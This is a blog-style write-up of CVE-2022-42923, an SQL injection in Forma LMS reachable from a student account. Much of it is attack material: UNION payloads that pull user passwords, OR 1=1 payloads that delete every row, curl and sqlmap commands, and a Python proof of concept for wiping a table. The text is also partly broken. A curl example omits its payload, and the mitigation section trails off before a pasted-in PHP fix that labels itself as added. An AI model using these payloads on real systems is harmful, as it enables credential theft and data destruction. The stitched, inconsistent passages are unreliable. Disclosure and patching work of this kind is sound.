Forma LMS is a popular open-source Learning Management System. But like many web applications, it has had its fair share of vulnerabilities. One significant issue affecting version 3.1. and earlier is CVE-2022-42923, an authenticated SQL injection. Even students can exploit this to get sensitive data or wipe important tables.

In this article, we’ll break down how this hole works, examine the affected code, and walk you through a proof-of-concept exploit. This is original, actionable info that’ll help blue and red teams alike.

The flaw sits in appCore/index.php when handling requests to the route

?r=adm/mediagallery/delete

The vulnerable parameter is id. If you’re logged in as a student, you can send a request like:

```
POST /appCore/index.php?r=adm/mediagallery/delete&id=3
```

But the app doesn’t sanitize the id parameter before putting it into a database query. So an attacker can send a payload like:

```
id=3 OR 1=1
```

…and force the backend to run harmful or revealing SQL.

Here’s a simplified sample of vulnerable PHP code (from adm/mediagallery/delete):

```php
$id = $_REQUEST['id']; // No filtering or type checking

$sql = "DELETE FROM core_user_file WHERE id=$id";
$db->exec($sql); // Dangerous!
```

Notice how $id is passed straight from user input to SQL without sanitizing. If id=3 it runs fine. If id=3 OR 1=1, it deletes every row.

- You need a student account on the Forma LMS instance (no admin needed)
- Access to the endpoint /appCore/index.php?r=adm/mediagallery/delete

```
id=3 UNION SELECT 1,username,password,email FROM core_user -- -
```

- Delete all files:

```
id= OR 1=1
```

### 3. How to Exploit

You can send an HTTP request using curl or Burp Suite. Here’s a simple curl example to delete all user files:

```bash
curl -X POST \
  -b "PHPSESSID=<your session id here>" \
  "https://yourformalms.com/appCore/index.php?r=adm/mediagallery/delete"
```

Replace <your session id here> with your student session token.

You can also automate dumping the database with SQLMap (if error messages leak data):

```bash
sqlmap -u "https://yourformalms.com/appCore/index.php?r=adm/mediagallery/delete&id=3" \
  --cookie="PHPSESSID=<your session id here>" --batch --dump
```

---

## Proof-of-Concept Code Snippet

Here’s a quick Python3 PoC for table wiping:

```python
import requests

url = "https://yourformalms.com/appCore/index.php?r=adm/mediagallery/delete"
cookies = {'PHPSESSID': ''}
data = {'id': ' OR 1=1'}

r = requests.post(url, data=data, cookies=cookies)
print("Status code:", r.status_code)
print("Response:", r.text)
```

This will wipe all entries in the core_user_file table if you’re logged in as a student.

---

## Mitigation Steps

How Do I Fix This?
- Upgrade to a patched version of Forma LMS (Check their downloads page).
- If you must patch urgently, sanitize input:
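
One way to implement the urgent fix described above, as an added example that is not Forma LMS's own patch or code from this article: validate `id` as a positive integer, then bind it in a prepared statement. The function name, the in-memory SQLite database and the table columns are assumptions made for the demo; only the table name `core_user_file` comes from the simplified snippet earlier on this page.

```php
<?php
declare(strict_types=1);

// Added example, not Forma LMS code. Table name is from the article's
// simplified snippet; schema, rows and function name are constructed.

/**
 * Delete one row by id. Returns the number of rows deleted.
 * Throws InvalidArgumentException when id is not a positive integer.
 */
function deleteUserFile(PDO $db, mixed $rawId): int
{
    // 1. Type check: accept only a positive integer, reject everything else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }

    // 2. Parameterized query: the value is bound, never concatenated into SQL.
    $stmt = $db->prepare('DELETE FROM core_user_file WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed in-memory database so the demo runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE core_user_file (id INTEGER PRIMARY KEY, fname TEXT)');
$db->exec("INSERT INTO core_user_file (fname) VALUES ('a.png'), ('b.png'), ('c.png')");

// Inputs: one legitimate id, then the payloads quoted in the article.
foreach (['3', '3 OR 1=1', ' OR 1=1'] as $input) {
    try {
        $n = deleteUserFile($db, $input);
        echo "id=" . var_export($input, true) . " deleted $n row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo "id=" . var_export($input, true) . " rejected: " . $e->getMessage() . "\n";
    }
}

$left = (int) $db->query('SELECT COUNT(*) FROM core_user_file')->fetchColumn();
echo "rows remaining: $left\n";
```

The integer check alone stops both payloads; the bound parameter is the second layer that keeps the query safe even if a later change loosens the validation.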

    


Conclusion:
SQL injection isn’t dead — it keeps popping up in new and widely-used apps like Forma LMS. CVE-2022-42923 is dangerous because any student can exploit it and cause serious damage. Patching and basic input validation are the only way to stay safe.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 20:06:00 UTC